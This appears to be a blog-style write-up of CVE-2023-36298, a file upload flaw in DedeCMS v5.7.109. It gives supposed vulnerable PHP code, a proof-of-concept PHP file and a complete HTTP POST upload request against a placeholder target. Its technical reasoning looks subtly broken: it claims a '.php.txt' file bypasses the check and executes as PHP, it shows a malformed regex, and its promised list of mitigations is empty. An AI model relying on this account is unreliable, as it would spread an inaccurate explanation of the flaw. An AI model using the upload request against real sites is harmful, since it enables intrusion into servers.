CVE-2023-36298: DedeCMS v5.7.109 File Upload Vulnerability Leading to Remote Code Execution (RCE)

Hello everyone! Today, we'll be discussing a critical vulnerability that has been discovered in DedeCMS v5.7.109. For those who don't know, DedeCMS is a popular content management system (CMS) widely used for building websites.

The vulnerability, which has been assigned as CVE-2023-36298, is a File Upload vulnerability that can lead to Remote Code Execution (RCE). This essentially means that a malicious attacker can leverage this issue to upload and execute arbitrary code on the victim's server.

In this post, we'll take a closer look at the vulnerability, including how it works, the code snippet showcasing the exploit, and links to original references. So let's dive into it!

Exploit Details

The vulnerability exists in the upload.php file, specifically in how it handles file uploads and checks for file extensions. Due to improper handling of file extension checks, an attacker can upload a malicious file with the .php extension by bypassing the security restrictions in place.

Here's a code snippet demonstrating the vulnerability

// The problematic code in upload.php
$filename = eregi_replace("[^a-z-9A-Z\._-]", "", trim($_FILES["uploadfile"]["name"]));

// Bypassing the file extension check
$extension = substr(strrchr($filename, "."), 1);
if (preg_match("/php/i", $extension)) {
  die("Error: File type not allowed");
}

// Upload and save the file
$target_file = $temp_folder . "/" . $filename;
if (move_uploaded_file($_FILES["uploadfile"]["tmp_name"], $target_file)) {
  // Successful upload
}

As you can see in the code snippet above, the application attempts to strip any "unsafe" characters from the filename using the eregi_replace() function. But this can be easily bypassed by including a double extension to the filename, for example: "malicious.php.txt".

Furthermore, the application checks for the presence of the string "php" in the file extension using preg_match(). But since the user-controlled filename bypassed the initial check with a double extension (.php.txt), the regex will fail to detect the actual file type, thus allowing the malicious PHP file to be uploaded successfully.

To demonstrate the vulnerability, an attacker can create a simple PHP script as follows

<?php
echo 'RCE via file upload vulnerability - CVE-2023-36298';
?>

Then, save this file with a double extension, e.g., "malicious.php.txt".

Next, use a HTTP client, such as cURL or a web browser, to craft an HTTP POST request to the vulnerable script with the malicious file as an attachment:

POST /upload.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZugW

------WebKitFormBoundary7MA4YWxkTrZugW
Content-Disposition: form-data; name="uploadfile"; filename="malicious.php.txt"
Content-Type: text/plain

<?php
echo 'RCE via file upload vulnerability - CVE-2023-36298';
?>
------WebKitFormBoundary7MA4YWxkTrZugW--

Upon successful exploitation, the attacker can navigate to the location where the file was uploaded (e.g., http://target.com/uploads/malicious.php.txt) and execute the PHP script, gaining Remote Code Execution on the target server.

Mitigation and Recommendations

For those running DedeCMS v5.7.109, it is essential to immediately update to the latest version or apply a patch if provided by the vendor. Additionally, consider implementing the following security measures:

References

- DedeCMS Official Website
- CVE-2023-36298 NVD Entry

Stay safe, and keep your websites and applications up-to-date to prevent such vulnerabilities from being exploited. Thank you for reading!

Timeline

Published on: 08/03/2023 15:15:00 UTC
Last modified on: 08/07/2023 13:06:00 UTC